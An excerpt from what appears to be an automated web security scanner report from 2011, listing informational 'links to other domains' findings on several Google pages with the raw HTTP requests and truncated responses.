<td>                                                                                <script type="text/javascript" src="http://w.sharethis.com/button/sharethis.js#publisher=68727f58-180b-4533-bb75-9095c2c1f7b7&amp;type=website&amp;post_services=email%2Cfacebook%2Ctwitter%2Cgbuzz%2Cmyspace%2Cdigg%2Csms%2Cwindows_live%2Cdelicious%2Cstumbleupon%2Creddit%2Cgoogle_bmarks%2Clinkedin%2Cbebo%2Cybuzz%2Cblogger%2Cyahoo_bmarks%2Cmixx%2Ctechnorati%2Cfriendfeed%2Cpropeller%2Cwordpress%2Cnewsvine"></script>
...[SNIP]...
<td align="center">
               <a href="http://twitter.com/FISinfo" target="_blank"><img src="/fis/gif/newnav/follow_twiter.gif" border="0">
...[SNIP]...
<td align="center">
               <a href="http://www.facebook.com/pages/Fish-Information-and-Services/228637974386?ref=ts" target="_blank"><img src="/fis/gif/newnav/follow_facebook.gif" border="0">
...[SNIP]...
<td align="center">
               <a href="http://www.youtube.com/FishInfoServices" target="_blank"><img src="/fis/gif/newnav/follow_youtube.gif" border="0">
...[SNIP]...

16.96. http://www.google.com/advanced_search  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /advanced_search

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /advanced_search?q=ipboard+software&hl=en&prmd=ivns HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:08:54 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>Google Advanced Search</title><style id=gstyle>html{overflow-y:scroll}div,td,.n a,.n a:visited{color:#000}.ts td,.
...[SNIP]...
</div><a href="http://www.youtube.com/?q=ipboard+software&hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.97. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /finance?q=ipboard+software&um=1&ie=UTF-8&sa=N&hl=en&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 03 Feb 2011 01:12:01 GMT
Expires: Thu, 03 Feb 2011 01:12:01 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>ipboard software - Google Finance Search</title>
<meta name="Description" content="Get r
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&um=1&ie=UTF-8&hl=en&sa=N&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</a>&nbsp;-
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

16.98. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /finance?q=bluefin+tuna&hl=en&tab=ne HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 03 Feb 2011 01:12:06 GMT
Expires: Thu, 03 Feb 2011 01:12:06 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>bluefin tuna - Google Finance Search</title>
<meta name="Description" content="Get real-
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=bluefin+tuna&hl=en&sa=N&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
</a>&nbsp;-
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

16.99. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /finance?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=we HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE7
Date: Thu, 03 Feb 2011 01:12:01 GMT
Expires: Thu, 03 Feb 2011 01:12:01 GMT
Cache-Control: private, max-age=0
Set-Cookie: SC=RV=659099:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Guess?, Inc.: NYSE:GES quotes & news - Google Finance</title>
<meta name="Description" c
...[SNIP]...
</div><a href="http://www.youtube.com/results?hl=en&q=ges&um=1&ie=UTF-8&sa=N&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div>Q3 2011 Earnings Conference Call -
<a onclick="_GF_click('', 'webcast', 'GES', '')" href="http://web.servicebureau.net/conf/meta?i=1113214965&amp;c=2343&amp;m=was&amp;u=/w_ccbn.xsl&amp;date_ticker=GES" class=time>
<img alt="Webcast" src="/finance/s/m4C5KaofCbA/images/cleardot.gif"
width=19 height=16 class=SP_webcast id=webcast>
...[SNIP]...
<td>
<a href="http://www.dailyfinance.com/event/GES/usa" >
More events from DailyFinance &raquo;</a>
...[SNIP]...
<br>
<a id=fs-chome href="http://www.guess.eu/" >
http://www.guess.eu/
</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-news&nyo=0" >News Releases</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-irhome" >Investor Relations</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-sec" >Financial Information</a>
...[SNIP]...
<div class=item><a id=fs- href="http://investors.guess.com/phoenix.zhtml?c=92506&p=irol-govBoard" >Executives</a>
...[SNIP]...
<div class=item><a id=fs- href="http://www.guess.com/worldofguess/" >Products/Services</a>
...[SNIP]...
<div class=item><a id=m-analyst
href=http://www.marketwatch.com/tools/quotes/snapshot.asp?symb=GES&pg=analyst >
Analyst Estimates</a>
...[SNIP]...
<div class=item><a id=m-sec
href=http://google.brand.edgar-online.com?sym=GES >
SEC Filings</a>
...[SNIP]...
<div class=item><a id=m-hold
href=http://moneycentral.msn.com/investor/invsub/ownership/ownership.asp?Symbol=GES >
Major Holders</a>
...[SNIP]...
<div class=item><a id=m-research
href=http://finance.yahoo.com/q/rr?s=GES >
Research Reports</a>
...[SNIP]...
<div class=item><a id=m-annualreport
href=http://annualreports.com/partners/Report/21590 >
Annual Report (PDF)</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://daytradingstockblog.blogspot.com/2011/02/mid-cap-stocks-fslr-slw-mtw-lulu.html" rel="nofollow" >Stock Market Analysis: Mid Cap Stocks ( FSLR, SLW, MTW, LULU )</a>
...[SNIP]...
<div class=item>
<a id="b-p-5" href="http://www.nasd100.com/2011/01/top-large-cap-stocks-with-highest-upside-potential-jan-31-2011.html" rel="nofollow" >Top Large Cap Stocks with Highest Upside Potential (Jan 31, 2011 ...</a>
...[SNIP]...
<div class=sfe-break-top>
<a id=m-rprofile href="http://stocks.us.reuters.com/stocks/fullDescription.asp?rpc=66&symbol=GES" >
More from Reuters &raquo;
</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3580" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=3581" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=806374" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1520152" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777470" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=165946" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=340038" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=777476" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=828372" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<br>
<a class=e-p href="http://www.reuters.com/finance/stocks/officerProfile?symbol=GES&officerId=1187892" >Bio&nbsp;&amp;&nbsp;Compensation</a>
...[SNIP]...
<div class=gb>
<a href="http://stocks.us.reuters.com/stocks/officersDirectors.asp?symbol=GES&WTmodLOC=C4-Officers-5" >
Full list on Reuters &raquo;</a>
...[SNIP]...
</a>&nbsp;-
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

16.100. http://www.google.com/finance  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /finance

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /finance?hl\x3den\x26tab\x3dwe\x22 HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Set-Cookie: SC=RV=:ED=us; expires=Sun, 17-Jan-2038 19:14:07 GMT; path=/finance; domain=.google.com
Date: Thu, 03 Feb 2011 01:12:02 GMT
Expires: Thu, 03 Feb 2011 01:12:02 GMT
Cache-Control: private, max-age=0
X-UA-Compatible: IE=EmulateIE7
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: SFE/0.8
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Google Finance: Stock market quotes, news, currency conversions & more</title>
<meta nam
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=e1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<span class=name>
<a href="http://www.ibtimes.com/articles/108195/20110202/world-market-overview-3-2-2011.htm" rel=nofollow id=n-hp- >World Market Overview&nbsp;3/2/2011</a>
...[SNIP]...
<div class=rel-article>
<a href="http://m.economictimes.com/PDAET/articleshow/7415541.cms" rel=nofollow id=n-hp- >S&amp;P 500 ends lower after recent gains</a>
...[SNIP]...
<div>
<a class=title href="http://www.reuters.com/article/2011/02/03/us-usa-healthcare-congress-idUSTRE70O62D20110203" rel=nofollow id=n-hp- >US Senate rejects bid to repeal healthcare law</a>
...[SNIP]...
<div>
<a class=title href="http://www.forbes.com/feeds/ap/2011/02/02/general-us-wall-street-box_8288839.html" rel=nofollow id=n-hp- >How the major stock indexes fared Wednesday</a>
...[SNIP]...
<div>
<a class=title href="http://www.businessweek.com/news/2011-02-02/oil-gains-a-second-day-as-egypt-unrest-prompts-supply-concern.html" rel=nofollow id=n-hp- >Oil Gains a Second Day as Egypt Unrest Prompts Supply Concern</a>
...[SNIP]...
<div>
<a class=title href="http://www.reuters.com/article/2011/02/02/financial-regulation-sefs-idUKN0221406420110202" rel=nofollow id=n-hp- >UPDATE 3-US SEC treads softly in swaps market transparency</a>
...[SNIP]...
<div>
<a class=title href="http://online.wsj.com/article/BT-CO-20110202-718210.html" rel=nofollow id=n-hp- >News Corp 2Q Earnings Double On TV, Ad Strength</a>
...[SNIP]...
</a>&nbsp;-
<a href="http://www.google.ca/finance" >Canada</a>
...[SNIP]...
</a>
- <a href="http://googlefinanceblog.blogspot.com/">Blog</a>
...[SNIP]...

16.101. http://www.google.com/images  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /images

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /images?q=ipboard+software&um=1&ie=UTF-8&source=og&sa=N&hl=en&tab=wi HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:10:56 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>ipboard software - Google Search</title><script>window.google={kEI:"oABKTY_kCIKclgerq5nlDw",kEXPI:"17259,28
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&um=1&hl=en&ie=UTF-8&sa=N&tab=i1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div style="display:none"><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcQqc8RGx0GCgSD9ktIwmsij1eokbDpnp5Vtmw7YVxOxW7A7vA" id=ipfANd9GcQqc8RGx0GCgSD9ktIwmsij1eokbDpnp5Vtmw7YVxOxW7A7vA width=127 height=102><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcTksAmkqO8BGR1PolIZKB_u6Z60oh_9LgcjUA-mCcKgjGE2zg" id=ipfANd9GcTksAmkqO8BGR1PolIZKB_u6Z60oh_9LgcjUA-mCcKgjGE2zg width=86 height=129><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t1.gstatic.com/images?q=tbn:ANd9GcTOXbzkcWszTgCW5g5rQsX06Qwaakd3OKZ_itxzv70C5KbPGw" id=ipfANd9GcTOXbzkcWszTgCW5g5rQsX06Qwaakd3OKZ_itxzv70C5KbPGw width=137 height=78><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcRowrgwwvKqWrSPned6Zubo8ZVolOmPAKgShXWWFPlGkpJhRpc" id=ipfANd9GcRowrgwwvKqWrSPned6Zubo8ZVolOmPAKgShXWWFPlGkpJhRpc width=48 height=48><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t1.gstatic.com/images?q=tbn:ANd9GcR3QrbxO4NUfcmhpDx_cYylZKnBItkIn0Xsoxs_ZPHSu2WH1QY" id=ipfANd9GcR3QrbxO4NUfcmhpDx_cYylZKnBItkIn0Xsoxs_ZPHSu2WH1QY width=150 height=82><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t1.gstatic.com/images?q=tbn:ANd9GcTRIHt5gXw9s057wMfHwcWrywmNbsZt73ETlwf7-iaUVut2tws" id=ipfANd9GcTRIHt5gXw9s057wMfHwcWrywmNbsZt73ETlwf7-iaUVut2tws width=121 height=136><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcQA59GsO2m7oGzJLsE145f45Q-kkBrw2t2OCvQOxdCJBbB5PKU" id=ipfANd9GcQA59GsO2m7oGzJLsE145f45Q-kkBrw2t2OCvQOxdCJBbB5PKU width=131 height=66><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcQnyzAZvY82e2k-udlcfHo83Hetj8d6IzfovaRLYrLStreR8Q" id=ipfANd9GcQnyzAZvY82e2k-udlcfHo83Hetj8d6IzfovaRLYrLStreR8Q width=135 height=104><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcR4SxcbMhMcf5XKAe0BgUXitwRYlzy4An0wPYznZlk1T3LXxg" id=ipfANd9GcR4SxcbMhMcf5XKAe0BgUXitwRYlzy4An0wPYznZlk1T3LXxg width=118 height=111><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcQW22dJJGXKEX2H2wD82Xf1O70xwLspZcZG42X0wANu3d7k_Q" id=ipfANd9GcQW22dJJGXKEX2H2wD82Xf1O70xwLspZcZG42X0wANu3d7k_Q width=135 height=77><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcRoUuOdHWNnZOdMXTrxLe9ieVwHmzROw5bNzdzOrBVgBS5vqg" id=ipfANd9GcRoUuOdHWNnZOdMXTrxLe9ieVwHmzROw5bNzdzOrBVgBS5vqg width=124 height=93><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcS_oxBZhpjgEm4cKJGlCI4Yn5BiNLybm-6Y1qye1gF92t2WL58" id=ipfANd9GcS_oxBZhpjgEm4cKJGlCI4Yn5BiNLybm-6Y1qye1gF92t2WL58 width=129 height=120></div>
...[SNIP]...

16.102. http://www.google.com/images  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /images

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /images?q=ipboard+software&hl=en&prmd=ivns&source=lnms&tbs=isch:1&ei=rtlJTei7OYL6lweT2cU3&sa=X&oi=mode_link&ct=mode&cd=2&ved=0CAcQ_AUoAQ HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:10:57 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><head><meta http-equiv=content-type content="text/html; charset=UTF-8"><title>ipboard software - Google Search</title><script>window.google={kEI:"oQBKTc7GOsGBlAfJvsTYDw",kEXPI:"17259,28
...[SNIP]...
</div><a href="http://www.youtube.com/results?q=ipboard+software&hl=en&prmd=ivns&ie=UTF-8&sa=N&tab=i1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...
<div style="display:none"><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcQqc8RGx0GCgSD9ktIwmsij1eokbDpnp5Vtmw7YVxOxW7A7vA" id=ipfANd9GcQqc8RGx0GCgSD9ktIwmsij1eokbDpnp5Vtmw7YVxOxW7A7vA width=127 height=102><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcTksAmkqO8BGR1PolIZKB_u6Z60oh_9LgcjUA-mCcKgjGE2zg" id=ipfANd9GcTksAmkqO8BGR1PolIZKB_u6Z60oh_9LgcjUA-mCcKgjGE2zg width=86 height=129><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t1.gstatic.com/images?q=tbn:ANd9GcTOXbzkcWszTgCW5g5rQsX06Qwaakd3OKZ_itxzv70C5KbPGw" id=ipfANd9GcTOXbzkcWszTgCW5g5rQsX06Qwaakd3OKZ_itxzv70C5KbPGw width=137 height=78><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcRowrgwwvKqWrSPned6Zubo8ZVolOmPAKgShXWWFPlGkpJhRpc" id=ipfANd9GcRowrgwwvKqWrSPned6Zubo8ZVolOmPAKgShXWWFPlGkpJhRpc width=48 height=48><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t1.gstatic.com/images?q=tbn:ANd9GcR3QrbxO4NUfcmhpDx_cYylZKnBItkIn0Xsoxs_ZPHSu2WH1QY" id=ipfANd9GcR3QrbxO4NUfcmhpDx_cYylZKnBItkIn0Xsoxs_ZPHSu2WH1QY width=150 height=82><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t1.gstatic.com/images?q=tbn:ANd9GcTRIHt5gXw9s057wMfHwcWrywmNbsZt73ETlwf7-iaUVut2tws" id=ipfANd9GcTRIHt5gXw9s057wMfHwcWrywmNbsZt73ETlwf7-iaUVut2tws width=121 height=136><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcQA59GsO2m7oGzJLsE145f45Q-kkBrw2t2OCvQOxdCJBbB5PKU" id=ipfANd9GcQA59GsO2m7oGzJLsE145f45Q-kkBrw2t2OCvQOxdCJBbB5PKU width=131 height=66><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcQnyzAZvY82e2k-udlcfHo83Hetj8d6IzfovaRLYrLStreR8Q" id=ipfANd9GcQnyzAZvY82e2k-udlcfHo83Hetj8d6IzfovaRLYrLStreR8Q width=135 height=104><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcR4SxcbMhMcf5XKAe0BgUXitwRYlzy4An0wPYznZlk1T3LXxg" id=ipfANd9GcR4SxcbMhMcf5XKAe0BgUXitwRYlzy4An0wPYznZlk1T3LXxg width=118 height=111><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t0.gstatic.com/images?q=tbn:ANd9GcQW22dJJGXKEX2H2wD82Xf1O70xwLspZcZG42X0wANu3d7k_Q" id=ipfANd9GcQW22dJJGXKEX2H2wD82Xf1O70xwLspZcZG42X0wANu3d7k_Q width=135 height=77><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t3.gstatic.com/images?q=tbn:ANd9GcRoUuOdHWNnZOdMXTrxLe9ieVwHmzROw5bNzdzOrBVgBS5vqg" id=ipfANd9GcRoUuOdHWNnZOdMXTrxLe9ieVwHmzROw5bNzdzOrBVgBS5vqg width=124 height=93><img style="border:1px solid #ccc;padding:1px;vertical-align:bottom" src="http://t2.gstatic.com/images?q=tbn:ANd9GcS_oxBZhpjgEm4cKJGlCI4Yn5BiNLybm-6Y1qye1gF92t2WL58" id=ipfANd9GcS_oxBZhpjgEm4cKJGlCI4Yn5BiNLybm-6Y1qye1gF92t2WL58 width=129 height=120></div>
...[SNIP]...

16.103. http://www.google.com/imghp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /imghp

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /imghp?q=bluefin+tuna&hl=en&tab=ni HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:15:16 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<!doctype html><html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><meta name="description" content="Google Images. The most comprehensive image search on the web."><title>G
...[SNIP]...
</div><a href="http://www.youtube.com/?q=bluefin+tuna&hl=en&tab=i1" onclick=gbar.qs(this) class=gb2>YouTube</a>
...[SNIP]...

16.104. http://www.google.com/language_tools  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.google.com
Path:   /language_tools

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /language_tools?hl=en HTTP/1.1
Host: www.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NID=43=b047N2rzcR5j1zMXEpdBo2hh5YJB0tHWlhpnTZC6sE2E0oKhqTIEWj3h1ndW_KVGzksu8DQxWwRLNl-jwmZDSNcoUTAIqVM648JqycJB7IgDEPB9m0hMSeKNwBC3xa69; PREF=ID=11a9f75446a95c33:U=f6f0157cbdaf97f8:FF=0:TM=1293845297:LM=1295377703:GM=1:S=8wu8JKm_kVjmCdUt;

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:09:02 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
Server: gws
X-XSS-Protection: 1; mode=block
Connection: close

<html><head><title>Language Tools</title><meta http-equiv="content-type" content="text/html;charset=UTF-8"><style>@import url(http://www.google.com/css/modules/g-flag.css);ol.g-flag {display: block;ov
...[SNIP]...
</div><a href="http://www.youtube.com/?hl=en&tab=w1" onclick=gbar.qs(this) class=gb2>YouTube</a>
